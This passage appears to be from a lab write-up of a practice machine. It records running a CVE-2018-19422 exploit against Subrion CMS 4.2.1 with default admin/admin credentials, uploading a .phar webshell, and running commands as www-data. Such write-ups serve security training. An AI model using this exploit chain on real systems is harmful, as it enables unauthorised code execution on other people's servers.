CVE-2018-19422
The target Subrion instance appears to be vulnerable to CVE-2018-19422 due to its outdated version; 4.2.1
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/exfiltrated]
└─$ python3 CVE-2018-19422.py --url http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: mtOiqqQRC66PFNNsZh6OynFTeXzjwAPK2YA5Thd9
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: vwpwdfclqtysurc
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/vwpwdfclqtysurc.phar
$ whoami
www-data
$ hostname
exfiltrated
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:aa:a9 brd ff:ff:ff:ff:ff:ff
inet 192.168.202.163/24 brd 192.168.202.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via exploiting CVE-2018-19422